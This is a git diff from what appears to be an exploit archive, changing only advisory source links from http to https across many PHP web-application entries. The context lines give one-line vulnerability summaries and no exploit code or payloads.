diff --git a/exploits/php/webapps/30113.txt b/exploits/php/webapps/30113.txt index d356405bd..d90a168eb 100644 --- a/exploits/php/webapps/30113.txt +++ b/exploits/php/webapps/30113.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24253/info +source: https://www.securityfocus.com/bid/24253/info PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. diff --git a/exploits/php/webapps/30114.txt b/exploits/php/webapps/30114.txt index 6227e5a63..313f6f0bd 100644 --- a/exploits/php/webapps/30114.txt +++ b/exploits/php/webapps/30114.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24253/info +source: https://www.securityfocus.com/bid/24253/info PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. diff --git a/exploits/php/webapps/30115.txt b/exploits/php/webapps/30115.txt index 15df1ff4c..c1e6dfac3 100644 --- a/exploits/php/webapps/30115.txt +++ b/exploits/php/webapps/30115.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24253/info +source: https://www.securityfocus.com/bid/24253/info PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. diff --git a/exploits/php/webapps/30116.txt b/exploits/php/webapps/30116.txt index 33a58a63e..f27f65c7f 100644 --- a/exploits/php/webapps/30116.txt +++ b/exploits/php/webapps/30116.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24253/info +source: https://www.securityfocus.com/bid/24253/info PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. diff --git a/exploits/php/webapps/30118.txt b/exploits/php/webapps/30118.txt index a360cd234..364b65531 100644 --- a/exploits/php/webapps/30118.txt +++ b/exploits/php/webapps/30118.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30119.txt b/exploits/php/webapps/30119.txt index 8ad9fe850..a4f3b0aeb 100644 --- a/exploits/php/webapps/30119.txt +++ b/exploits/php/webapps/30119.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30120.txt b/exploits/php/webapps/30120.txt index 9ab90b86a..b66d36b74 100644 --- a/exploits/php/webapps/30120.txt +++ b/exploits/php/webapps/30120.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30121.txt b/exploits/php/webapps/30121.txt index 799e659e1..1446b1843 100644 --- a/exploits/php/webapps/30121.txt +++ b/exploits/php/webapps/30121.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30122.txt b/exploits/php/webapps/30122.txt index 4c2433a8f..f4048f05c 100644 --- a/exploits/php/webapps/30122.txt +++ b/exploits/php/webapps/30122.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30123.txt b/exploits/php/webapps/30123.txt index 075daa27d..883ad1a2f 100644 --- a/exploits/php/webapps/30123.txt +++ b/exploits/php/webapps/30123.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30124.txt b/exploits/php/webapps/30124.txt index 7560b4ced..616d494f5 100644 --- a/exploits/php/webapps/30124.txt +++ b/exploits/php/webapps/30124.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30125.txt b/exploits/php/webapps/30125.txt index 18814f09a..b03785edb 100644 --- a/exploits/php/webapps/30125.txt +++ b/exploits/php/webapps/30125.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30126.txt b/exploits/php/webapps/30126.txt index 40712f3a4..78d0a6ac6 100644 --- a/exploits/php/webapps/30126.txt +++ b/exploits/php/webapps/30126.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30127.txt b/exploits/php/webapps/30127.txt index 3510744c9..234ce1fae 100644 --- a/exploits/php/webapps/30127.txt +++ b/exploits/php/webapps/30127.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30128.txt b/exploits/php/webapps/30128.txt index ce41e5bb8..de4993c09 100644 --- a/exploits/php/webapps/30128.txt +++ b/exploits/php/webapps/30128.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30129.txt b/exploits/php/webapps/30129.txt index d16e29c9b..fbeb7e6b0 100644 --- a/exploits/php/webapps/30129.txt +++ b/exploits/php/webapps/30129.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24266/info +source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30131.txt b/exploits/php/webapps/30131.txt index 3cbf974f2..74869e0bc 100644 --- a/exploits/php/webapps/30131.txt +++ b/exploits/php/webapps/30131.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24269/info +source: https://www.securityfocus.com/bid/24269/info Buttercup WFM (Web File Manager) is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30132.txt b/exploits/php/webapps/30132.txt index 6bd6111f3..47d38330c 100644 --- a/exploits/php/webapps/30132.txt +++ b/exploits/php/webapps/30132.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24270/info +source: https://www.securityfocus.com/bid/24270/info Evenzia CMS is prone to a cross-site script vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30133.txt b/exploits/php/webapps/30133.txt index f54e13c44..bc7855c39 100644 --- a/exploits/php/webapps/30133.txt +++ b/exploits/php/webapps/30133.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24276/info +source: https://www.securityfocus.com/bid/24276/info PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30134.txt b/exploits/php/webapps/30134.txt index 31d8629bf..20a6d31df 100644 --- a/exploits/php/webapps/30134.txt +++ b/exploits/php/webapps/30134.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24276/info +source: https://www.securityfocus.com/bid/24276/info PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30135.txt b/exploits/php/webapps/30135.txt index a533944d5..49057609d 100644 --- a/exploits/php/webapps/30135.txt +++ b/exploits/php/webapps/30135.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24276/info +source: https://www.securityfocus.com/bid/24276/info PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30136.txt b/exploits/php/webapps/30136.txt index ee3193c96..26f34301d 100644 --- a/exploits/php/webapps/30136.txt +++ b/exploits/php/webapps/30136.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24276/info +source: https://www.securityfocus.com/bid/24276/info PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30137.txt b/exploits/php/webapps/30137.txt index 5b27ee733..001750c39 100644 --- a/exploits/php/webapps/30137.txt +++ b/exploits/php/webapps/30137.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24276/info +source: https://www.securityfocus.com/bid/24276/info PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30138.txt b/exploits/php/webapps/30138.txt index 79d1a616e..1034463c6 100644 --- a/exploits/php/webapps/30138.txt +++ b/exploits/php/webapps/30138.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24277/info +source: https://www.securityfocus.com/bid/24277/info Codelib Linker is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30140.txt b/exploits/php/webapps/30140.txt index c0f5db219..0d772441b 100644 --- a/exploits/php/webapps/30140.txt +++ b/exploits/php/webapps/30140.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24285/info +source: https://www.securityfocus.com/bid/24285/info Okyanusmedya is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30143.txt b/exploits/php/webapps/30143.txt index 6d5266963..470ef14e0 100644 --- a/exploits/php/webapps/30143.txt +++ b/exploits/php/webapps/30143.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24297/info +source: https://www.securityfocus.com/bid/24297/info WebStudio CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30152.txt b/exploits/php/webapps/30152.txt index 9ef06dd17..87c39ed8b 100644 --- a/exploits/php/webapps/30152.txt +++ b/exploits/php/webapps/30152.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24311/info +source: https://www.securityfocus.com/bid/24311/info My DataBook is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. diff --git a/exploits/php/webapps/30153.txt b/exploits/php/webapps/30153.txt index 3696a8aa4..9abbb4c9b 100644 --- a/exploits/php/webapps/30153.txt +++ b/exploits/php/webapps/30153.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24311/info +source: https://www.securityfocus.com/bid/24311/info My DataBook is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. diff --git a/exploits/php/webapps/30157.txt b/exploits/php/webapps/30157.txt index 0689c5d17..602da8605 100644 --- a/exploits/php/webapps/30157.txt +++ b/exploits/php/webapps/30157.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24342/info +source: https://www.securityfocus.com/bid/24342/info JD-Wiki is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/30158.txt b/exploits/php/webapps/30158.txt index b24778463..43b7e09e1 100644 --- a/exploits/php/webapps/30158.txt +++ b/exploits/php/webapps/30158.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24342/info +source: https://www.securityfocus.com/bid/24342/info JD-Wiki is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30161.txt b/exploits/php/webapps/30161.txt index 7ae56312b..ec1833c27 100644 --- a/exploits/php/webapps/30161.txt +++ b/exploits/php/webapps/30161.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24363/info +source: https://www.securityfocus.com/bid/24363/info Atom PhotoBlog is prone to multiple input-validation vulnerabilities because it fails to adequately sanitize user-supplied input data before rendering it in a user's browser. These issues include multiple HTML-injection vulnerabilities and a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30162.txt b/exploits/php/webapps/30162.txt index 17070af97..28aab2b44 100644 --- a/exploits/php/webapps/30162.txt +++ b/exploits/php/webapps/30162.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24365/info +source: https://www.securityfocus.com/bid/24365/info WmsCMS is prone to multiple cross-site scripting vulnerabilities because it fails to adequately sanitize user-supplied input data before rendering it in a user's browser. diff --git a/exploits/php/webapps/30166.txt b/exploits/php/webapps/30166.txt index df37f1e64..9698e6cc5 100644 --- a/exploits/php/webapps/30166.txt +++ b/exploits/php/webapps/30166.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24383/info +source: https://www.securityfocus.com/bid/24383/info WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/30168.txt b/exploits/php/webapps/30168.txt index 143c4da88..a33eb00e6 100644 --- a/exploits/php/webapps/30168.txt +++ b/exploits/php/webapps/30168.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24397/info +source: https://www.securityfocus.com/bid/24397/info vBSupport is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30170.txt b/exploits/php/webapps/30170.txt index 39af4d21c..3017aa2c4 100644 --- a/exploits/php/webapps/30170.txt +++ b/exploits/php/webapps/30170.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24413/info +source: https://www.securityfocus.com/bid/24413/info Beehive Forum is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30171.txt b/exploits/php/webapps/30171.txt index ea260acca..d3d03f037 100644 --- a/exploits/php/webapps/30171.txt +++ b/exploits/php/webapps/30171.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24414/info +source: https://www.securityfocus.com/bid/24414/info Just For Fun Network Management and Monitoring System (JFFNMS) is prone to multiple remote vulnerabilities, including a cross-site scripting issue, an SQL-injection issue, and multiple information-disclosure issues. diff --git a/exploits/php/webapps/30172.txt b/exploits/php/webapps/30172.txt index 73211be2a..327df601c 100644 --- a/exploits/php/webapps/30172.txt +++ b/exploits/php/webapps/30172.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24414/info +source: https://www.securityfocus.com/bid/24414/info Just For Fun Network Management and Monitoring System (JFFNMS) is prone to multiple remote vulnerabilities, including a cross-site scripting issue, an SQL-injection issue, and multiple information-disclosure issues. 
diff --git a/exploits/php/webapps/30173.txt b/exploits/php/webapps/30173.txt index 1a986ed51..0a1e6f3ce 100644 --- a/exploits/php/webapps/30173.txt +++ b/exploits/php/webapps/30173.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24414/info +source: https://www.securityfocus.com/bid/24414/info Just For Fun Network Management and Monitoring System (JFFNMS) is prone to multiple remote vulnerabilities, including a cross-site scripting issue, an SQL-injection issue, and multiple information-disclosure issues. diff --git a/exploits/php/webapps/30174.txt b/exploits/php/webapps/30174.txt index c70e455fe..6be823507 100644 --- a/exploits/php/webapps/30174.txt +++ b/exploits/php/webapps/30174.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24414/info +source: https://www.securityfocus.com/bid/24414/info Just For Fun Network Management and Monitoring System (JFFNMS) is prone to multiple remote vulnerabilities, including a cross-site scripting issue, an SQL-injection issue, and multiple information-disclosure issues. diff --git a/exploits/php/webapps/30175.txt b/exploits/php/webapps/30175.txt index 1da5709b6..907f10f4e 100644 --- a/exploits/php/webapps/30175.txt +++ b/exploits/php/webapps/30175.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24422/info +source: https://www.securityfocus.com/bid/24422/info BBpress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30190.txt b/exploits/php/webapps/30190.txt index d44aa84b9..3b5c95586 100644 --- a/exploits/php/webapps/30190.txt +++ b/exploits/php/webapps/30190.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24479/info +source: https://www.securityfocus.com/bid/24479/info The Joomla! Letterman Subscriber module is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/30197.txt b/exploits/php/webapps/30197.txt index a2357afc9..594cdeb54 100644 --- a/exploits/php/webapps/30197.txt +++ b/exploits/php/webapps/30197.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24513/info +source: https://www.securityfocus.com/bid/24513/info WSPortal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30200.txt b/exploits/php/webapps/30200.txt index 0d316a5e7..cb8997695 100644 --- a/exploits/php/webapps/30200.txt +++ b/exploits/php/webapps/30200.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24517/info +source: https://www.securityfocus.com/bid/24517/info Php Hosting Biller is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30201.txt b/exploits/php/webapps/30201.txt index 51012fa17..f7d4b4db9 100644 --- a/exploits/php/webapps/30201.txt +++ b/exploits/php/webapps/30201.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24522/info +source: https://www.securityfocus.com/bid/24522/info Fuzzylime is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30217.txt b/exploits/php/webapps/30217.txt index 3902e3aa0..306280fb0 100644 --- a/exploits/php/webapps/30217.txt +++ b/exploits/php/webapps/30217.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24565/info +source: https://www.securityfocus.com/bid/24565/info Wrapper.php for OsCommerce is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30220.txt b/exploits/php/webapps/30220.txt index 9272e1bd0..ebb2e1bef 100644 --- a/exploits/php/webapps/30220.txt +++ b/exploits/php/webapps/30220.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24572/info +source: https://www.securityfocus.com/bid/24572/info PHP Accounts is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30221.txt b/exploits/php/webapps/30221.txt index 3f37ebe99..e4a6811e3 100644 --- a/exploits/php/webapps/30221.txt +++ b/exploits/php/webapps/30221.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24574/info +source: https://www.securityfocus.com/bid/24574/info PHP Accounts is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30223.txt b/exploits/php/webapps/30223.txt index a58c776d2..0d8525d76 100644 --- a/exploits/php/webapps/30223.txt +++ b/exploits/php/webapps/30223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24584/info +source: https://www.securityfocus.com/bid/24584/info NetClassifieds is prone to multiple input-validation vulnerabilities because the application fails to sanitize user-supplied input. These vulnerabilities include multiple SQL-injection issues and cross-site scripting issues. diff --git a/exploits/php/webapps/30225.txt b/exploits/php/webapps/30225.txt index ef204cb31..c214f79a6 100644 --- a/exploits/php/webapps/30225.txt +++ b/exploits/php/webapps/30225.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24590/info +source: https://www.securityfocus.com/bid/24590/info eNdonesia is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30226.txt b/exploits/php/webapps/30226.txt index 46faa8c81..0c1ad8c6c 100644 --- a/exploits/php/webapps/30226.txt +++ b/exploits/php/webapps/30226.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24590/info +source: https://www.securityfocus.com/bid/24590/info eNdonesia is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30227.txt b/exploits/php/webapps/30227.txt index c37997d70..f4a7689ca 100644 --- a/exploits/php/webapps/30227.txt +++ b/exploits/php/webapps/30227.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24591/info +source: https://www.securityfocus.com/bid/24591/info The 'mod_forum' component for Joomla and Mambo is prone to a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30230.txt b/exploits/php/webapps/30230.txt index 539f410bc..0744d9304 100644 --- a/exploits/php/webapps/30230.txt +++ b/exploits/php/webapps/30230.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24621/info +source: https://www.securityfocus.com/bid/24621/info MyNews is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30232.txt b/exploits/php/webapps/30232.txt index 76de63734..2f828f0eb 100644 --- a/exploits/php/webapps/30232.txt +++ b/exploits/php/webapps/30232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24626/info +source: https://www.securityfocus.com/bid/24626/info Calendrix is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30234.txt b/exploits/php/webapps/30234.txt index 0de7215bd..76202ae4f 100644 --- a/exploits/php/webapps/30234.txt +++ b/exploits/php/webapps/30234.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24633/info +source: https://www.securityfocus.com/bid/24633/info Calendarix is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30249.txt b/exploits/php/webapps/30249.txt index 3db679b05..9e68b5add 100644 --- a/exploits/php/webapps/30249.txt +++ b/exploits/php/webapps/30249.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24634/info +source: https://www.securityfocus.com/bid/24634/info Papoo is prone to an authentication-bypass vulnerability because the application fails to check user privileges when accessing the administration pages. diff --git a/exploits/php/webapps/30253.txt b/exploits/php/webapps/30253.txt index e8e8e734f..92207caae 100644 --- a/exploits/php/webapps/30253.txt +++ b/exploits/php/webapps/30253.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24681/info +source: https://www.securityfocus.com/bid/24681/info eTicket is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/30259.txt b/exploits/php/webapps/30259.txt index 27df8466c..60bb292f3 100644 --- a/exploits/php/webapps/30259.txt +++ b/exploits/php/webapps/30259.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24742/info +source: https://www.securityfocus.com/bid/24742/info Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30261.txt b/exploits/php/webapps/30261.txt index ee21c7d1c..f2adbef71 100644 --- a/exploits/php/webapps/30261.txt +++ b/exploits/php/webapps/30261.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24748/info +source: https://www.securityfocus.com/bid/24748/info Moodle is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30262.txt b/exploits/php/webapps/30262.txt index 009a3bc7c..9ffe26029 100644 --- a/exploits/php/webapps/30262.txt +++ b/exploits/php/webapps/30262.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24749/info +source: https://www.securityfocus.com/bid/24749/info Liesbeth Base CMS is prone to an information-disclosure vulnerability. diff --git a/exploits/php/webapps/30277.txt b/exploits/php/webapps/30277.txt index 4332468bc..44a1e8ede 100644 --- a/exploits/php/webapps/30277.txt +++ b/exploits/php/webapps/30277.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24770/info +source: https://www.securityfocus.com/bid/24770/info Maia Mailguard is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30283.txt b/exploits/php/webapps/30283.txt index 28127f08f..52cd3f8f8 100644 --- a/exploits/php/webapps/30283.txt +++ b/exploits/php/webapps/30283.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24828/info +source: https://www.securityfocus.com/bid/24828/info Vulnerabilities in the SquirrelMail G/PGP encryption plugin may allow malicious webmail users to execute system commands remotely. These issues occur because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30290.txt b/exploits/php/webapps/30290.txt index 524453157..f93ee69b5 100644 --- a/exploits/php/webapps/30290.txt +++ b/exploits/php/webapps/30290.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24864/info +source: https://www.securityfocus.com/bid/24864/info The IBM Proventia Sensor Appliance is prone to multiple input-validation vulnerabilities, including multiple remote file-include issues and a cross-site scripting issue. diff --git a/exploits/php/webapps/30293.txt b/exploits/php/webapps/30293.txt index f0d5b5f1b..71b265a39 100644 --- a/exploits/php/webapps/30293.txt +++ b/exploits/php/webapps/30293.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24880/info +source: https://www.securityfocus.com/bid/24880/info Helma is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30294.txt b/exploits/php/webapps/30294.txt index fdea054f5..86e0fad3d 100644 --- a/exploits/php/webapps/30294.txt +++ b/exploits/php/webapps/30294.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24884/info +source: https://www.securityfocus.com/bid/24884/info Inmostore is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30299.txt b/exploits/php/webapps/30299.txt index 95237ed38..47a529383 100644 --- a/exploits/php/webapps/30299.txt +++ b/exploits/php/webapps/30299.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24898/info +source: https://www.securityfocus.com/bid/24898/info activeWeb contentserver is prone to a client-side input-validation vulnerability because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30301.txt b/exploits/php/webapps/30301.txt index 0e0e51ba0..de52eef26 100644 --- a/exploits/php/webapps/30301.txt +++ b/exploits/php/webapps/30301.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24910/info +source: https://www.securityfocus.com/bid/24910/info AzDG Dating Gold is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30302.txt b/exploits/php/webapps/30302.txt index 7ef82b123..b991c67a5 100644 --- a/exploits/php/webapps/30302.txt +++ b/exploits/php/webapps/30302.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24910/info +source: https://www.securityfocus.com/bid/24910/info AzDG Dating Gold is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30303.txt b/exploits/php/webapps/30303.txt index 14f2661f5..cedfbe812 100644 --- a/exploits/php/webapps/30303.txt +++ b/exploits/php/webapps/30303.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24910/info +source: https://www.securityfocus.com/bid/24910/info AzDG Dating Gold is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30312.txt b/exploits/php/webapps/30312.txt index 3bac24fa3..fa3b44ca1 100644 --- a/exploits/php/webapps/30312.txt +++ b/exploits/php/webapps/30312.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24913/info +source: https://www.securityfocus.com/bid/24913/info Citadel WebCit is prone to multiple input-validation vulnerabilities, including multiple HTML-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/30317.txt b/exploits/php/webapps/30317.txt index b0e249d6e..31a44f4a7 100644 --- a/exploits/php/webapps/30317.txt +++ b/exploits/php/webapps/30317.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24934/info +source: https://www.securityfocus.com/bid/24934/info Insanely Simple Blog is prone to multiple input-validation vulnerabilities, including cross-site scripting, HTML-injection, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30318.txt b/exploits/php/webapps/30318.txt index 70ebed738..01f5c50e6 100644 --- a/exploits/php/webapps/30318.txt +++ b/exploits/php/webapps/30318.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24934/info +source: https://www.securityfocus.com/bid/24934/info Insanely Simple Blog is prone to multiple input-validation vulnerabilities, including cross-site scripting, HTML-injection, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30320.txt b/exploits/php/webapps/30320.txt index 9c4d5e396..978ceb933 100644 --- a/exploits/php/webapps/30320.txt +++ b/exploits/php/webapps/30320.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24966/info +source: https://www.securityfocus.com/bid/24966/info geoBlog is prone to multiple security-bypass vulnerabilities because the application fails to properly validate users when deleting user blogs and comments. diff --git a/exploits/php/webapps/30321.txt b/exploits/php/webapps/30321.txt index 